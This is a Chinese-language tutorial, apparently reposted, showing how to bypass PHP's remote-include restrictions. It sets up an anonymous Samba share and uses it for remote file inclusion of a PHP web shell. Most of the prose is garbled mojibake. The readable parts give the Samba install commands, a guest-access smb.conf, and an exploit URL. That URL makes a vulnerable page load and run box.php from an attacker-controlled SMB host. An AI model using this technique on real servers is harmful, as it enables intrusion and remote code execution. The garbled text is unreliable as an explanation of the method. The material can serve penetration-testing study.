使用SMB共享来绕过php远程文件包含的限制执行RFI的利用

å¨è¿ç¯åæ中ï¼æå°ä¸ºå¤§å®¶æ¼ç¤ºå¦ä½å©ç¨PHPåºç¨ä¸­çè¿ç¨æ件åå«æ¼æ´çææ¯ãæ们å°ç»è¿phpè¿ç¨æ件åå«çéå¶ï¼å¹¶æ§è¡RFIçå©ç¨ï¼å³ä½¿PHPç¯å¢è¢«é置为ä¸åå«æ¥èªè¿ç¨HTTP/FTP URLçæ件ã

PHP å SMB å±äº«æ件访é®

å¨PHPéç½®æ件中ï¼âallow_url_includeâwrapperé»è®¤è®¾ç½®ä¸ºâOffâï¼æ示PHPä¸å è½½è¿ç¨HTTPæFTP URLï¼ä»èé²æ­¢è¿ç¨æ件åå«æ»å»ãä½æ¯ï¼å³ä½¿âallow_url_includeâåâallow_url_fopenâé½è®¾ç½®ä¸ºâOffâï¼PHPä¹ä¸ä¼é»æ­¢å è½½SMB URLãèè¿å°±ææå¯è½è¢«æ»¥ç¨æ¥ä»SMBå±äº«å è½½è¿ç¨æ管çPHP Web shellã

æ»å»åºæ¯æ¦è¿°

å½æåæ»å»çPHPåºç¨ç¨åºä»£ç å°è¯ä»åæ»å»èæ§å¶çSMBå±äº«å è½½PHP Web shellæ¶ï¼SMBå±äº«åºå许访é®è¯¥æ件ãæ»å»èéè¦å¨å¶ä¸éç½®å·æå¿åæµè§è®¿é®æéçSMBæå¡å¨ãå æ­¤ï¼ä¸æ¦æåæ»å»çåºç¨ç¨åºå°è¯ä»SMBå±äº«è®¿é®PHP Web shellï¼SMBæå¡å¨å°ä¸ä¼è¦æ±ä»»ä½çå­æ®ï¼æåæ»å»çåºç¨ç¨åºå°åå«Web shellçPHP代ç ã

é¦åï¼æéæ°éç½®äºPHPç¯å¢ï¼å¹¶å¨php.in iæ件中ç¦ç¨äºâallow-url-fopenâåâallow-url-includeâãä¹åï¼éç½®äºå·æå¿åæµè§è®¿é®çSMBæå¡å¨ãä¸æ¦SMBå±äº«åå¤å°±ç»ªï¼æ们就å¯ä»¥å©ç¨æåæ»å»çåºç¨ç¨åºäºã

PHP ç¯å¢è®¾ç½®

å°æ管æåæ»å»ä»£ç çæºå¨ä¸çâallow_url_fopenâåâallow_url_includeâ设置为âOffâ

以ä¸æ¯çæ¬ä¸ºâ5.5.11âçPHPå½åéç½®æªå¾ï¼

å¨ç»§ç»­ä¸ä¸æ­¥ä¹åï¼è®©æ们确ä¿å½æ们å°è¯è®¿é®HTTPä¸æ管çWeb shellæ¶ï¼PHP代ç ä¸å许è¿ç¨æ件åå«ã

å¯ä»¥çå°ï¼å½æè¯å¾ä»è¿ç¨ä¸»æºåå«PHP Web shellæ¶ï¼åºç¨ç¨åºæåºé误并ä¸æ²¡æåå«è¿ç¨æ件ã

使ç¨å¿åæµè§è®¿é®éç½® Samba æå¡å¨ï¼Linux æºå¨ï¼
使ç¨ä»¥ä¸å½ä»¤å®è£Sambaæå¡å¨ï¼

apt-get install sambaå建SMBå±äº«ç®å½ï¼

mkdir /var/www/html/pub/

éç½®æ°å建çSMBå±äº«ç®å½çæéï¼

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

è¿è¡ä»¥ä¸å½ä»¤ï¼å é¤SAMBAæå¡å¨éç½®æ件çé»è®¤å容ã

echo > /etc/samba/smb.confå°ä»¥ä¸å容添å å°/etc/samba/smb.confæ件ã

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555

force user = nobodyç°å¨ï¼éå¯SAMBAæå¡å¨ä»¥ä½¿éç½®æ件/etc/samba/smb.conf中çæ°éç½®çæã

service smbd restartæåéå¯SAMBAæå¡å¨åï¼å°è¯è®¿é®SMBå±äº«å¹¶ç¡®ä¿SAMBAæå¡å¨ä¸è¦æ±æä¾å­æ®ã

å¨æ¬ä¾ä¸­ï¼SAMBAæå¡å¨IP为192.168.0.3ï¼æéè¦è®¿é®Windowsæ件æµè§å¨ä¸­çSMBå±äº«ï¼å¦ä¸ï¼

\\192.168.0.3\ 

å¨ SMB å±äº«ä¸­æ管 PHP Web shell

太æ£äºï¼å¯ä»¥è®¿é®smbå±äº«ï¼å¹¶æ¾ç¤ºç®å½âicaâå­å¨ã

ç°å¨ï¼å°PHP shellæ管å¨ç®å½â/var/www/html/pubâ中ï¼è¯¥ç®å½ä¸ºsmbå±äº«ç®å½âicaâã

æåæ管PHP shellåï¼æ们使ç¨Windowsæ件æµè§å¨è®¿é®SMBå±äº«ç®å½âicaâã

\\192.168.0.3\ica\å¯ä»¥çå°php shellå­å¨äºsmbå±äº«ç®å½ä¸­ï¼å¨æ¬ä¾ä¸­ä¸ºbox.phpæ件ã

å©ç¨æ件åå«æåæ»å»çåæ°
让æ们使ç¨è¿ä¸ªPHP shell SMBé¾æ¥ï¼ä»¥åæåæ»å»çphp代ç æµè§å®ã

http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.phpPHPæåæ»å»ç代ç ä»SMBå±äº«ä¸­è·åäºweb shellï¼å¹¶å¨åºç¨ç¨åºæå¡å¨ä¸æ§è¡äºä»£ç \m/ãæ们已ç»ç»è¿äºphpè¿ç¨æ件åå«çéå¶ï¼å¹¶åå«äºæ管å¨è¿ç¨ä¸»æºä¸çWeb shellã

æ»ç»

以ä¸æè¿°æ¯å°ç¼ç»å¤§å®¶ä»ç»ç使ç¨SMBå±äº«æ¥ç»è¿phpè¿ç¨æ件åå«çéå¶æ§è¡RFIçå©ç¨ï¼å¸æ对大家ææ帮å©ï¼å¦æ大家æä»»ä½çé®è¯·ç»æçè¨ï¼å°ç¼ä¼åæ¶åå¤å¤§å®¶çãå¨æ­¤ä¹é常æ谢大家对èæ¬ä¹å®¶ç½ç«çæ¯æï¼